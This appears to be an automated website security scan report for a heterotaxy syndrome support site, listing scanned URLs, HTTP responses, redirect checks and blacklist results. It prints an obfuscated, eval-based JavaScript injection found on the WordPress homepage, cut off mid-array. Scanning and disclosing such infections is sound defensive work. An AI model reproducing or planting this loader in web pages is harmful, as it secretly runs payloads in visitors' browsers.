Scanned pages/files
Request | Server response | Status |
http://www.heterotaxysyndrome.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 16:59:26 GMT Location: http://heterotaxysyndrome.org/wordpress Server: Apache Content-Length: 323 Content-Type: text/html; charset=iso-8859-1 | clean |
http://heterotaxysyndrome.org/wordpress | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 16:59:26 GMT Location: http://heterotaxysyndrome.org/wordpress/ Server: Apache Content-Length: 320 Content-Type: text/html; charset=iso-8859-1 | clean |
http://heterotaxysyndrome.org/wordpress/ | 200 OK Content-Length: 47387 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) dbshre=48;try{window.document.body++}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,3 z=s;e(s);}} Antivirus reports:
| ||
http://heterotaxysyndrome.org/wordpress/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/superfish.js?ver=3.5.1 | 200 OK Content-Length: 3710 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/supersubs.js?ver=3.5.1 | 200 OK Content-Length: 3298 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/superfish-dropdown-menu/js/jquery.bgiframe.min.js?ver=3.5.1 | 200 OK Content-Length: 1517 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/buddypress/bp-groups/js/widget-groups.js?ver=3.5.1 | 200 OK Content-Length: 975 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/plugins/gtranslate/jquery-translate.js?ver=3.5.1 | 200 OK Content-Length: 16301 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-includes/js/comment-reply.min.js?ver=3.5.1 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://w.sharethis.com/button/buttons.js | 200 OK Content-Length: 144141 Content-Type: application/x-javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-content/themes/platformpro/sections/features/jquery.cycle.js?ver=2.94 | 200 OK Content-Length: 31539 Content-Type: application/javascript | clean |
http://heterotaxysyndrome.org/wordpress/wp-includes/js/hoverIntent.min.js?ver=r6 | 200 OK Content-Length: 996 Content-Type: application/javascript | clean |
http://www.heterotaxysyndrome.org/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: heterotaxysyndrome.org
Result:
GET / HTTP/1.1
Host: heterotaxysyndrome.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: heterotaxysyndrome.org
Referer: http://www.google.com/search?q=heterotaxysyndrome.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: heterotaxysyndrome.org
Referer: http://www.google.com/search?q=heterotaxysyndrome.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heterotaxysyndrome.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://heterotaxysyndrome.org/
Result: heterotaxysyndrome.org is not infected or malware details are not published yet.
Result: heterotaxysyndrome.org is not infected or malware details are not published yet.